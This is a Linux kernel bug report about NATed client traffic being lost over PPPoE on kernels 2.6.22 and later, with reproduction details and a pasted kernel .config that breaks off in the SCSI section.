    <t>Latest working kernel version: 2.6.21.7 Earliest failing kernel version: 2.6.22 Distribution: Slackware Hardware Environment: Ibm Thinkpad T23 Intel(R) Pentium(R) III Mobile CPU 1133MHz Software Environment: Problem Description: Packet are not handled back to clients, neither are see on ppp0 Steps to reproduce: Just put a MASQUERADE rule in iptables, to NAT packects from client to internet, with a FORWARD rule that allow the packects to be forwarded. Try to ping or dig or telnet or whatever from the client and nothing happens. My configuration is : CLIENT ----&gt; T23 -----&gt; DSL-MODEM -----&gt; INTERNET Client = linux machine T23 = linux machine with everything configure to act as a dsl router On T23 I'm using vanilla kernel recompiled by myself, using the same config that is working on 2.6.21.7 pppoe binaries is : root /usr/src &gt;/usr/sbin/pppoe -V Roaring Penguin PPPoE Version 3.8 I have another linux machine on internet, that I have used to verify the problem. When I run the ping from the client, on the router I can see the packet come in from the eth0 and leaving natted from the ppp0. On the internet machine I see the icmp packet ( or whatever packet I send ) coming in, and the reply going out to the router machine. This packet seems to be lost ( i can't see it on the router either on ppp interface than on eth0 interface ), by using tcpdump (3.9.5). If the communication is started from the router ( icmp, ssh, whatever ) everything works well. Running the 2.6.21.7 but keeping the same configuration for kernel, iptables and all, is seen on router and handled back to client. Not working behavior is seen on 2.6.22+ to 2.6.26.3 Working behavior is seen on 2.6.21.7- ( at last to 2.6.19.2 which was my starting kernel ) At beginning I thought the problem was with iptables root /usr/src &gt;iptables -V iptables v1.3.8 but the strange thing is that I can't even see the reply packets on ppp0 interface, while if the trouble was on iptables rules, then I should have seen the packet and then I should have seen it dropped somewhere. Anyway I have put netfilters guys in CC just in case I'm wrong. Googling around I have seen others that have similar behavior and I have seen that in 2.6.22 there is been a lot of change in pppoe area. Let me know if you need more informations. The 2.6.22 .config is: # # Automatically generated make config: don't edit # Linux kernel version: 2.6.22 # Sun Aug 31 17:11:00 2008 # CONFIG_X86_32=y CONFIG_GENERIC_TIME=y CONFIG_CLOCKSOURCE_WATCHDOG=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_X86=y CONFIG_MMU=y CONFIG_ZONE_DMA=y CONFIG_QUICKLIST=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_BROKEN_ON_SMP=y CONFIG_INIT_ENV_ARG_LIMIT=32 # # General setup # CONFIG_LOCALVERSION="" CONFIG_LOCALVERSION_AUTO=y CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_IPC_NS is not set CONFIG_SYSVIPC_SYSCTL=y # CONFIG_POSIX_MQUEUE is not set CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set # CONFIG_TASKSTATS is not set # CONFIG_UTS_NS is not set # CONFIG_AUDIT is not set CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_SYSFS_DEPRECATED=y # CONFIG_RELAY is not set # CONFIG_BLK_DEV_INITRD is not set CONFIG_CC_OPTIMIZE_FOR_SIZE=y CONFIG_SYSCTL=y # CONFIG_EMBEDDED is not set CONFIG_UID16=y CONFIG_SYSCTL_SYSCALL=y CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_ALL is not set # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_TIMERFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_SLAB=y # CONFIG_SLUB is not set # CONFIG_SLOB is not set CONFIG_RT_MUTEXES=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_MODVERSIONS=y # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y # # Block layer # CONFIG_BLOCK=y # CONFIG_LBD is not set # CONFIG_BLK_DEV_IO_TRACE is not set # CONFIG_LSF is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" # # Processor type and features # # CONFIG_TICK_ONESHOT is not set # CONFIG_NO_HZ is not set # CONFIG_HIGH_RES_TIMERS is not set # CONFIG_SMP is not set CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_PARAVIRT is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUMM is not set # CONFIG_MCORE2 is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MEFFICEON is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MGEODEGX1 is not set # CONFIG_MGEODE_LX is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_MVIAC7 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_X86_XADD=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y # CONFIG_ARCH_HAS_ILOG2_U32 is not set # CONFIG_ARCH_HAS_ILOG2_U64 is not set CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_TSC=y CONFIG_X86_CMOV=y CONFIG_X86_MINIMUM_CPU_MODEL=4 CONFIG_HPET_TIMER=y # CONFIG_PREEMPT_NONE is not set CONFIG_PREEMPT_VOLUNTARY=y # CONFIG_PREEMPT is not set CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y CONFIG_X86_MCE_P4THERMAL=y CONFIG_VM86=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_X86_REBOOTFIXUPS is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_DELL_RBU is not set # CONFIG_DCDBAS is not set # CONFIG_NOHIGHMEM is not set CONFIG_HIGHMEM4G=y # CONFIG_HIGHMEM64G is not set CONFIG_PAGE_OFFSET=0xC0000000 CONFIG_HIGHMEM=y CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_ARCH_POPULATES_NODE_MAP=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_SPARSEMEM_STATIC=y CONFIG_SPLIT_PTLOCK_CPUS=4 # CONFIG_RESOURCES_64BIT is not set CONFIG_ZONE_DMA_FLAG=1 CONFIG_NR_QUICK=1 # CONFIG_HIGHPTE is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set CONFIG_HZ_250=y # CONFIG_HZ_300 is not set # CONFIG_HZ_1000 is not set CONFIG_HZ=250 # CONFIG_KEXEC is not set # CONFIG_CRASH_DUMP is not set CONFIG_PHYSICAL_START=0x100000 # CONFIG_RELOCATABLE is not set CONFIG_PHYSICAL_ALIGN=0x100000 CONFIG_COMPAT_VDSO=y CONFIG_ARCH_ENABLE_MEMORY_HOTPLUG=y # # Power management options (ACPI, APM) # CONFIG_PM=y CONFIG_PM_LEGACY=y # CONFIG_PM_DEBUG is not set # CONFIG_PM_SYSFS_DEPRECATED is not set # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y # CONFIG_ACPI_SLEEP_PROC_SLEEP is not set CONFIG_ACPI_PROCFS=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y # CONFIG_ACPI_DOCK is not set CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_CUSTOM_DSDT is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y # CONFIG_ACPI_CONTAINER is not set # CONFIG_ACPI_SBS is not set CONFIG_APM=m CONFIG_APM_IGNORE_USER_SUSPEND=y CONFIG_APM_DO_ENABLE=y CONFIG_APM_CPU_IDLE=y CONFIG_APM_DISPLAY_BLANK=y CONFIG_APM_ALLOW_INTS=y CONFIG_APM_REAL_MODE_POWER_OFF=y # # CPU Frequency scaling # CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=y # CONFIG_CPU_FREQ_DEBUG is not set CONFIG_CPU_FREQ_STAT=y # CONFIG_CPU_FREQ_STAT_DETAILS is not set # CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE is not set CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE=y # CONFIG_CPU_FREQ_GOV_PERFORMANCE is not set # CONFIG_CPU_FREQ_GOV_POWERSAVE is not set CONFIG_CPU_FREQ_GOV_USERSPACE=y # CONFIG_CPU_FREQ_GOV_ONDEMAND is not set # CONFIG_CPU_FREQ_GOV_CONSERVATIVE is not set # # CPUFreq processor drivers # # CONFIG_X86_ACPI_CPUFREQ is not set # CONFIG_X86_POWERNOW_K6 is not set # CONFIG_X86_POWERNOW_K7 is not set # CONFIG_X86_POWERNOW_K8 is not set # CONFIG_X86_GX_SUSPMOD is not set CONFIG_X86_SPEEDSTEP_CENTRINO=m CONFIG_X86_SPEEDSTEP_CENTRINO_ACPI=y # CONFIG_X86_SPEEDSTEP_CENTRINO_TABLE is not set CONFIG_X86_SPEEDSTEP_ICH=m CONFIG_X86_SPEEDSTEP_SMI=m # CONFIG_X86_P4_CLOCKMOD is not set # CONFIG_X86_CPUFREQ_NFORCE2 is not set # CONFIG_X86_LONGRUN is not set # CONFIG_X86_LONGHAUL is not set # CONFIG_X86_E_POWERSAVER is not set # # shared options # # CONFIG_X86_ACPI_CPUFREQ_PROC_INTF is not set CONFIG_X86_SPEEDSTEP_LIB=m # CONFIG_X86_SPEEDSTEP_RELAXED_CAP_CHECK is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCIEPORTBUS is not set CONFIG_ARCH_SUPPORTS_MSI=y # CONFIG_PCI_MSI is not set # CONFIG_PCI_DEBUG is not set CONFIG_HT_IRQ=y CONFIG_ISA_DMA_API=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCCARD (PCMCIA/CardBus) support # CONFIG_PCCARD=m CONFIG_PCMCIA_DEBUG=y CONFIG_PCMCIA=m CONFIG_PCMCIA_LOAD_CIS=y CONFIG_PCMCIA_IOCTL=y CONFIG_CARDBUS=y # # PC-card bridges # CONFIG_YENTA=m CONFIG_YENTA_O2=y CONFIG_YENTA_RICOH=y CONFIG_YENTA_TI=y CONFIG_YENTA_ENE_TUNE=y CONFIG_YENTA_TOSHIBA=y # CONFIG_PD6729 is not set # CONFIG_I82092 is not set CONFIG_PCCARD_NONSTATIC=m CONFIG_HOTPLUG_PCI=m # CONFIG_HOTPLUG_PCI_FAKE is not set # CONFIG_HOTPLUG_PCI_COMPAQ is not set # CONFIG_HOTPLUG_PCI_IBM is not set # CONFIG_HOTPLUG_PCI_ACPI is not set # CONFIG_HOTPLUG_PCI_CPCI is not set # CONFIG_HOTPLUG_PCI_SHPC is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Networking # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set CONFIG_UNIX=y CONFIG_XFRM=y CONFIG_XFRM_USER=y # CONFIG_XFRM_SUB_POLICY is not set # CONFIG_XFRM_MIGRATE is not set # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set CONFIG_IP_FIB_HASH=y # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=m CONFIG_NET_IPGRE=m # CONFIG_NET_IPGRE_BROADCAST is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y CONFIG_INET_XFRM_TUNNEL=y CONFIG_INET_TUNNEL=y CONFIG_INET_XFRM_MODE_TRANSPORT=y CONFIG_INET_XFRM_MODE_TUNNEL=y CONFIG_INET_XFRM_MODE_BEET=y CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_CUBIC=y CONFIG_DEFAULT_TCP_CONG="cubic" # CONFIG_TCP_MD5SIG is not set # CONFIG_IP_VS is not set CONFIG_IPV6=m # CONFIG_IPV6_PRIVACY is not set # CONFIG_IPV6_ROUTER_PREF is not set # CONFIG_IPV6_OPTIMISTIC_DAD is not set # CONFIG_INET6_AH is not set # CONFIG_INET6_ESP is not set # CONFIG_INET6_IPCOMP is not set # CONFIG_IPV6_MIP6 is not set # CONFIG_INET6_XFRM_TUNNEL is not set # CONFIG_INET6_TUNNEL is not set CONFIG_INET6_XFRM_MODE_TRANSPORT=m CONFIG_INET6_XFRM_MODE_TUNNEL=m CONFIG_INET6_XFRM_MODE_BEET=m # CONFIG_INET6_XFRM_MODE_ROUTEOPTIMIZATION is not set CONFIG_IPV6_SIT=m # CONFIG_IPV6_TUNNEL is not set # CONFIG_IPV6_MULTIPLE_TABLES is not set # CONFIG_NETLABEL is not set # CONFIG_NETWORK_SECMARK is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_BRIDGE_NETFILTER=y # # Core Netfilter Configuration # CONFIG_NETFILTER_NETLINK=m CONFIG_NETFILTER_NETLINK_QUEUE=m CONFIG_NETFILTER_NETLINK_LOG=m CONFIG_NF_CONNTRACK_ENABLED=m CONFIG_NF_CONNTRACK=m # CONFIG_NF_CT_ACCT is not set CONFIG_NF_CONNTRACK_MARK=y CONFIG_NF_CONNTRACK_EVENTS=y CONFIG_NF_CT_PROTO_SCTP=m CONFIG_NF_CONNTRACK_AMANDA=m CONFIG_NF_CONNTRACK_FTP=m CONFIG_NF_CONNTRACK_H323=m CONFIG_NF_CONNTRACK_IRC=m # CONFIG_NF_CONNTRACK_NETBIOS_NS is not set # CONFIG_NF_CONNTRACK_PPTP is not set # CONFIG_NF_CONNTRACK_SANE is not set # CONFIG_NF_CONNTRACK_SIP is not set # CONFIG_NF_CONNTRACK_TFTP is not set # CONFIG_NF_CT_NETLINK is not set CONFIG_NETFILTER_XTABLES=m CONFIG_NETFILTER_XT_TARGET_CLASSIFY=m CONFIG_NETFILTER_XT_TARGET_CONNMARK=m CONFIG_NETFILTER_XT_TARGET_DSCP=m CONFIG_NETFILTER_XT_TARGET_MARK=m CONFIG_NETFILTER_XT_TARGET_NFQUEUE=m # CONFIG_NETFILTER_XT_TARGET_NFLOG is not set # CONFIG_NETFILTER_XT_TARGET_NOTRACK is not set # CONFIG_NETFILTER_XT_TARGET_TCPMSS is not set CONFIG_NETFILTER_XT_MATCH_COMMENT=m # CONFIG_NETFILTER_XT_MATCH_CONNBYTES is not set # CONFIG_NETFILTER_XT_MATCH_CONNMARK is not set CONFIG_NETFILTER_XT_MATCH_CONNTRACK=m CONFIG_NETFILTER_XT_MATCH_DCCP=m CONFIG_NETFILTER_XT_MATCH_DSCP=m CONFIG_NETFILTER_XT_MATCH_ESP=m # CONFIG_NETFILTER_XT_MATCH_HELPER is not set CONFIG_NETFILTER_XT_MATCH_LENGTH=m CONFIG_NETFILTER_XT_MATCH_LIMIT=m CONFIG_NETFILTER_XT_MATCH_MAC=m CONFIG_NETFILTER_XT_MATCH_MARK=m CONFIG_NETFILTER_XT_MATCH_POLICY=m CONFIG_NETFILTER_XT_MATCH_MULTIPORT=m CONFIG_NETFILTER_XT_MATCH_PHYSDEV=m CONFIG_NETFILTER_XT_MATCH_PKTTYPE=m CONFIG_NETFILTER_XT_MATCH_QUOTA=m CONFIG_NETFILTER_XT_MATCH_REALM=m CONFIG_NETFILTER_XT_MATCH_SCTP=m CONFIG_NETFILTER_XT_MATCH_STATE=m CONFIG_NETFILTER_XT_MATCH_STATISTIC=m CONFIG_NETFILTER_XT_MATCH_STRING=m CONFIG_NETFILTER_XT_MATCH_TCPMSS=m # CONFIG_NETFILTER_XT_MATCH_HASHLIMIT is not set # # IP: Netfilter Configuration # CONFIG_NF_CONNTRACK_IPV4=m CONFIG_NF_CONNTRACK_PROC_COMPAT=y CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_IPRANGE=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_AH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_MATCH_ADDRTYPE=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_NF_NAT=m CONFIG_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m # CONFIG_IP_NF_TARGET_NETMAP is not set # CONFIG_IP_NF_TARGET_SAME is not set # CONFIG_NF_NAT_SNMP_BASIC is not set CONFIG_NF_NAT_FTP=m CONFIG_NF_NAT_IRC=m # CONFIG_NF_NAT_TFTP is not set CONFIG_NF_NAT_AMANDA=m # CONFIG_NF_NAT_PPTP is not set CONFIG_NF_NAT_H323=m # CONFIG_NF_NAT_SIP is not set CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_TTL=m # CONFIG_IP_NF_TARGET_CLUSTERIP is not set CONFIG_IP_NF_RAW=m CONFIG_IP_NF_ARPTABLES=m # CONFIG_IP_NF_ARPFILTER is not set # CONFIG_IP_NF_ARP_MANGLE is not set # # IPv6: Netfilter Configuration (EXPERIMENTAL) # # CONFIG_NF_CONNTRACK_IPV6 is not set # CONFIG_IP6_NF_QUEUE is not set # CONFIG_IP6_NF_IPTABLES is not set # # Bridge: Netfilter Configuration # # CONFIG_BRIDGE_NF_EBTABLES is not set # CONFIG_IP_DCCP is not set # CONFIG_IP_SCTP is not set # CONFIG_TIPC is not set # CONFIG_ATM is not set CONFIG_BRIDGE=m CONFIG_VLAN_8021Q=m # CONFIG_DECNET is not set CONFIG_LLC=m # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # CONFIG_NET_SCHED=y CONFIG_NET_SCH_FIFO=y # # Queueing/Scheduling # CONFIG_NET_SCH_CBQ=m CONFIG_NET_SCH_HTB=m CONFIG_NET_SCH_HFSC=m CONFIG_NET_SCH_PRIO=m CONFIG_NET_SCH_RED=m CONFIG_NET_SCH_SFQ=m CONFIG_NET_SCH_TEQL=m CONFIG_NET_SCH_TBF=m CONFIG_NET_SCH_GRED=m CONFIG_NET_SCH_DSMARK=m # CONFIG_NET_SCH_NETEM is not set CONFIG_NET_SCH_INGRESS=m # # Classification # CONFIG_NET_CLS=y # CONFIG_NET_CLS_BASIC is not set CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m # CONFIG_CLS_U32_PERF is not set # CONFIG_CLS_U32_MARK is not set CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m # CONFIG_NET_EMATCH is not set # CONFIG_NET_CLS_ACT is not set CONFIG_NET_CLS_POLICE=y # CONFIG_NET_CLS_IND is not set CONFIG_NET_ESTIMATOR=y # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set CONFIG_IRDA=m # # IrDA protocols # CONFIG_IRLAN=m CONFIG_IRNET=m CONFIG_IRCOMM=m # CONFIG_IRDA_ULTRA is not set # # IrDA options # CONFIG_IRDA_CACHE_LAST_LSAP=y CONFIG_IRDA_FAST_RR=y # CONFIG_IRDA_DEBUG is not set # # Infrared-port device drivers # # # SIR device drivers # CONFIG_IRTTY_SIR=m # # Dongle support # # CONFIG_DONGLE is not set # CONFIG_KINGSUN_DONGLE is not set # # Old SIR device drivers # # CONFIG_IRPORT_SIR is not set # # Old Serial dongle support # # # FIR device drivers # # CONFIG_USB_IRDA is not set # CONFIG_SIGMATEL_FIR is not set CONFIG_NSC_FIR=m # CONFIG_WINBOND_FIR is not set # CONFIG_TOSHIBA_FIR is not set # CONFIG_SMC_IRCC_FIR is not set # CONFIG_ALI_FIR is not set # CONFIG_VLSI_FIR is not set # CONFIG_VIA_FIR is not set # CONFIG_MCS_FIR is not set # CONFIG_BT is not set # CONFIG_AF_RXRPC is not set # # Wireless # # CONFIG_CFG80211 is not set # CONFIG_WIRELESS_EXT is not set # CONFIG_MAC80211 is not set CONFIG_IEEE80211=m # CONFIG_IEEE80211_DEBUG is not set CONFIG_IEEE80211_CRYPT_WEP=m CONFIG_IEEE80211_CRYPT_CCMP=m # CONFIG_IEEE80211_CRYPT_TKIP is not set # CONFIG_IEEE80211_SOFTMAC is not set # CONFIG_RFKILL is not set # # Device Drivers # # # Generic Driver Options # # CONFIG_STANDALONE is not set CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=m # CONFIG_DEBUG_DRIVER is not set # CONFIG_DEBUG_DEVRES is not set # CONFIG_SYS_HYPERVISOR is not set # # Connector - unified userspace &lt;-&gt; kernelspace linker # # CONFIG_CONNECTOR is not set # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_GSC is not set # CONFIG_PARPORT_AX88796 is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_PNPACPI=y # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_CDROM_PKTCDVD is not set # CONFIG_ATA_OVER_ETH is not set # # Misc devices # # CONFIG_IBM_ASM is not set # CONFIG_PHANTOM is not set # CONFIG_SGI_IOC4 is not set # CONFIG_TIFM_CORE is not set # CONFIG_SONY_LAPTOP is not set # CONFIG_THINKPAD_ACPI is not set CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECS=m # CONFIG_BLK_DEV_DELKIN is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_BLK_DEV_IDEACPI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_PROC_FS=y # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_IDEPCI_PCIBUS_ORDER=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_CS5535 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_JMICRON is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_IT8213 is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_BLK_DEV_TC86C001 is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=y # CONFIG_SCSI_TGT is not set # CONFIG_SCSI_NETLINK is not set CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=m # CONFIG_CHR_DEV_SCH is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_CONSTANTS=y CONFIG_SCSI_LOGGING=y # CONFIG_SCSI_SCAN_ASYNC is not set CONFIG_SCSI_WAIT_SCAN=m # # SCSI Transports # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # CONFIG_SCSI_ISCSI_ATTRS is not set # CONFIG_SCSI_SAS_ATTRS is 